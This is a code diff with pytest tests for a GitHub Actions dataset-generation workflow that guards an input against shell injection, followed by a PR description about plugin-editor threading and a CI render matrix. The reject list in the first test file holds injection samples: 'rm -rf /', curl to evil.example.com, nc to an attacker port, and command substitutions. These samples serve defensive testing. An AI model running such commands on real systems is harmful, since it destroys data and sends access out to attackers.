+    """Load `generate-dataset-shards.yaml` once per module.
+
+    :param project_root: Repo root provided by the `tests/infra/conftest.py` fixture.
+    :returns: Parsed YAML as a plain dict.
+    :rtype: dict
+    """
+    return yaml.safe_load((project_root / WORKFLOW_RELATIVE_PATH).read_text())
+
+
+@pytest.fixture(scope="module")
+def generate_steps(workflow: dict) -> list[dict]:
+    """Return the ordered ``steps`` list for the ``generate`` job.
+
+    :param workflow: Parsed workflow YAML.
+    :returns: List of step dicts.
+    :rtype: list[dict]
+    """
+    return workflow["jobs"]["generate"]["steps"]
+
+
+def test_validation_step_exists(generate_steps: list[dict]) -> None:
+    """Assert the `Validate hydra_overrides` step is present.
+
+    :param generate_steps: Ordered steps list for the ``generate`` job.
+    """
+    names = [step.get("name", "") for step in generate_steps]
+    assert VALIDATION_STEP_NAME in names, (
+        f"`generate-dataset-shards.yaml` is missing the {VALIDATION_STEP_NAME!r} step — "
+        f"without it, the runpod/oci docker row's unquoted "
+        f"`$HYDRA_OVERRIDES_EXTRA` expansion allows shell injection. "
+        f"Found steps: {names!r}"
+    )
+
+
+def test_validation_step_uses_expected_character_class(generate_steps: list[dict]) -> None:
+    """Assert the validation step's `run` body invokes the documented regex.
+
+    :param generate_steps: Ordered steps list for the ``generate`` job.
+    """
+    step = _find_step(generate_steps, name=VALIDATION_STEP_NAME)
+    body = step["run"]
+    assert EXPECTED_REGEX_LITERAL in body, (
+        f"{VALIDATION_STEP_NAME!r} step does not invoke the expected regex "
+        f"{EXPECTED_REGEX_LITERAL!r}; the validation must reject any character "
+        f"outside {EXPECTED_CHARACTER_CLASS!r} so shell metacharacters can't ride "
+        f"through the unquoted docker expansion. Got body: {body!r}"
+    )
+
+
+def test_validation_step_reads_inputs_hydra_overrides(generate_steps: list[dict]) -> None:
+    """Assert the validation step's env binds the workflow input it gates.
+
+    :param generate_steps: Ordered steps list for the ``generate`` job.
+    """
+    step = _find_step(generate_steps, name=VALIDATION_STEP_NAME)
+    env = step.get("env", {})
+    bound_input = env.get("INPUT_HYDRA_OVERRIDES", "")
+    assert "inputs.hydra_overrides" in bound_input, (
+        f"{VALIDATION_STEP_NAME!r}.env must bind INPUT_HYDRA_OVERRIDES to "
+        f"`inputs.hydra_overrides`; otherwise the regex check would run against the "
+        f"wrong (or empty) value. Got: {env!r}"
+    )
+
+
+def test_validation_runs_before_docker_step(generate_steps: list[dict]) -> None:
+    """Assert the validation step precedes the docker invocation.
+
+    The runpod/oci docker step expands ``$HYDRA_OVERRIDES_EXTRA`` unquoted inside
+    ``bash -c``. Placing the regex check after that step would still let the unsafe
+    expansion run, defeating the purpose.
+
+    :param generate_steps: Ordered steps list for the ``generate`` job.
+    """
+    validation_idx = _index_of(generate_steps, name=VALIDATION_STEP_NAME)
+    docker_idx = _index_of(generate_steps, step_id=DOCKER_STEP_ID)
+    assert validation_idx < docker_idx, (
+        f"{VALIDATION_STEP_NAME!r} (index {validation_idx}) must run before the "
+        f"`{DOCKER_STEP_ID}` step (index {docker_idx}); otherwise the unquoted "
+        f"`$HYDRA_OVERRIDES_EXTRA` expansion would run on unvalidated input."
+    )
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "",
+        "render.gui_toggle_cadence=always_on",
+        "render.gui_toggle_cadence=always_on output_format=wds",
+        "skypilot_launch.num_workers=4",
+        "key=value-with-dash",
+        "path=foo/bar/baz",
+        "list=a,b,c",
+    ],
+)
+def test_regex_accepts_safe_overrides(value: str) -> None:
+    """Cross-check the documented regex matches every safe-looking sample.
+
+    :param value: A ``hydra_overrides`` candidate the workflow must accept.
+    """
+    assert re.fullmatch(EXPECTED_REGEX_LITERAL, value), (
+        f"Regex {EXPECTED_REGEX_LITERAL!r} unexpectedly rejected safe input {value!r}; "
+        f"the workflow would fail real callers."
+    )
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "render.gui_toggle_cadence=always_on; rm -rf /",
+        "key=value && curl evil.example.com",
+        "key=value | nc attacker 4444",
+        "key=$(whoami)",
+        "key=`id`",
+        "key=value > /etc/passwd",
+        "key=value\nmalicious",
+        "key=value\trest",
+        "key=value  double-space",
+        "key=value;",
+        "key=value*",
+        "key=value?",
+        'key="quoted"',
+        "key=value\\;",
+    ],
+)
+def test_regex_rejects_shell_metacharacters(value: str) -> None:
+    """Cross-check the documented regex rejects every shell-injection sample.
+
+    :param value: A ``hydra_overrides`` candidate that must fail validation.
+    """
+    assert not re.fullmatch(EXPECTED_REGEX_LITERAL, value), (
+        f"Regex {EXPECTED_REGEX_LITERAL!r} accepted unsafe input {value!r}; the "
+        f"unquoted docker expansion would interpret it as shell syntax."
+    )
+
+
+def _find_step(steps: list[dict], *, name: str) -> dict:
+    """Return the first step in `steps` whose `name` matches.
+
+    :param steps: The job's `steps` list.
+    :param name: Value to match against each step's `name` field.
+    :returns: The matched step dict.
+    :rtype: dict
+    :raises AssertionError: When no step has the given `name`.
+    """
+    for step in steps:
+        if step.get("name") == name:
+            return step
+    raise AssertionError(f"No step with name={name!r} found")
+
+
+def _index_of(steps: list[dict], *, name: str | None = None, step_id: str | None = None) -> int:
+    """Return the position of the matching step in `steps`.
+
+    :param steps: The job's `steps` list.
+    :param name: Match against `step.name` when provided.
+    :param step_id: Match against `step.id` when provided.
+    :returns: Zero-based index of the matched step.
+    :rtype: int
+    :raises AssertionError: When no step matches, or neither selector was provided.
+    """
+    if name is None and step_id is None:
+        raise AssertionError("_index_of requires either `name` or `step_id`")
+    for idx, step in enumerate(steps):
+        if name is not None and step.get("name") == name:
+            return idx
+        if step_id is not None and step.get("id") == step_id:
+            return idx
+    raise AssertionError(f"No step matched name={name!r} step_id={step_id!r}")

--- a/tests/pipeline/test_schemas/test_dataset_spec.py
+++ b/tests/pipeline/test_schemas/test_dataset_spec.py
@@ -278,6 +278,29 @@ class TestRenderConfig:
                 }
             )
 
+    def test_always_on_with_default_plugin_reload_cadence_raises(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """``"always_on"`` without an explicit ``plugin_reload_cadence`` hits the schema default.
+
+        Pins the contract: callers that opt into ``always_on`` must also set
+        ``plugin_reload_cadence="once"`` — relying on the schema default
+        (``"render"``) is a configuration error and surfaces at construction,
+        not at render time.
+
+        :param monkeypatch: Pytest fixture used to stub ``_current_platform``.
+        """
+        monkeypatch.setattr(
+            "synth_setter.pipeline.schemas.spec._current_platform", lambda: "linux"
+        )
+        kwargs = _valid_render_kwargs()
+        kwargs.pop("plugin_reload_cadence", None)
+        with pytest.raises(
+            ValidationError,
+            match=r'gui_toggle_cadence="always_on" requires plugin_reload_cadence="once"',
+        ):
+            RenderConfig(**{**kwargs, "gui_toggle_cadence": "always_on"})
+
     def test_always_on_accepted_on_darwin(self, monkeypatch: pytest.MonkeyPatch) -> None:
         """``"always_on"`` is permitted on Darwin (single open, below #714 threshold).
 


### PR DESCRIPTION
## Summary

- Inverts the thread model for the `always_on` GUI-toggle cadence path: `pedalboard.show_editor` now runs on the process main thread while the render body runs on a daemon worker (#1204). Pedalboard 0.9.x requires `show_editor` on the main thread, so the previous daemon-thread editor crashed `always_on` cells.
- Introduces `run_with_editor_held_open(plugin, body)` (in `src/synth_setter/data/vst/core.py`) — the helper starts the daemon worker, blocks the caller in `plugin.show_editor`, then signals the worker to drain via a shared `close_editor` event. Worker exceptions propagate to the caller after `show_editor` returns and take precedence over the leak signal.
- Adds `RenderWorkerLeaked` (`RuntimeError` subclass) raised when the worker outlives `_EDITOR_JOIN_TIMEOUT_SECONDS` (2.0s) or exits without producing a result or exception. The helper never returns successfully with a live worker, so callers like `_render_in_batches` cannot continue while renders or `flush_batch` are still in flight on the background thread.
- The previous `editor_held_open` contextmanager, the `editor_started` start handshake, and the `EditorStartTimeout` exception were removed entirely — they are not part of the current implementation.

Closes #1198

## CI: render-config matrix workflow (also in this PR)

Adds `.github/workflows/test-dataset-generation-render-matrix.yml` so render-side regressions surface at PR time instead of waiting for the nightly cron.

- **What it does** — 8-cell parallel matrix of `smoke-shard` × `render.gui_toggle_cadence` (`never` / `once` / `render` / `always_on`) × `output_format` (`hdf5` / `wds`), each cell calling the existing `generate-dataset-shards.yaml` reusable.
- **Why** — catches regressions in the thread-inversion (#1204), the `always_on` gui-toggle cadence (#1187), the cadence dispatch, and the hydra-override + override-character-validation machinery on the PR that introduces them.
- **Trigger** — pull_request paths gated to `src/synth_setter/data/vst/**`, `src/synth_setter/data/render_config.py`, `src/synth_setter/pipeline/schemas/spec.py`, `src/synth_setter/cli/generate_dataset.py`, `configs/experiment/generate_dataset/**`, `configs/render/**`, and the two workflow files themselves. `workflow_dispatch` for manual coverage; `inputs.docker_image_tag` is gated with a `|| 'dev-snapshot'` fallback so evaluation succeeds on `pull_request`.

## Hydra-override materialization (narrowly scoped)

To let the matrix workflow pass `render.gui_toggle_cadence=<cell>` as a Hydra override, the key has to be materialized in the composed config — Hydra's struct mode otherwise rejects the override. The materialization is **scoped to the matrix's base experiment only** (`configs/experiment/generate_dataset/smoke-shard.yaml`); `configs/render/surge_xt.yaml` keeps the platform-aware default factory (`"render"` on Linux, `"never"` on Darwin) so every other inheritor of `surge_xt` (`smoke-shard-wds`, `ci-materialize-test`, `ci-materialize-test-wds`, `surge-simple-480k-10k`, `10-1k-shards`, `nightly-parallel-smoke`) keeps its previous default.

The render-matrix workflow also validates `hydra_overrides` at workflow entry: the input must match `^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$` via whole-input bash `[[ =~ ]]` matching (no shell metacharacters, no newlines, no carriage returns, no double-spaces). This closes the multi-line bypass that the original line-oriented `grep -Eq` would have allowed.

## Test plan

- [x] `pytest tests/data/vst/test_core.py` — 18 passed (includes `test_run_with_editor_held_open_raises_on_worker_leak`, `test_run_with_editor_held_open_propagates_body_exception_even_on_slow_finish`, `test_run_with_editor_held_open_no_silent_none_return`)
- [x] `pytest tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py` — covers the whole-input bash regex used by the workflow (parses the YAML, asserts `[[ =~ ]]`, and parametrizes multi-line payloads)
- [x] `pre-commit run --files src/synth_setter/data/vst/core.py tests/data/vst/test_core.py .github/workflows/generate-dataset-shards.yaml .github/workflows/test-dataset-generation-render-matrix.yml` — clean
- [x] Render-matrix workflow itself runs the 8 cells in parallel per push to a matching path
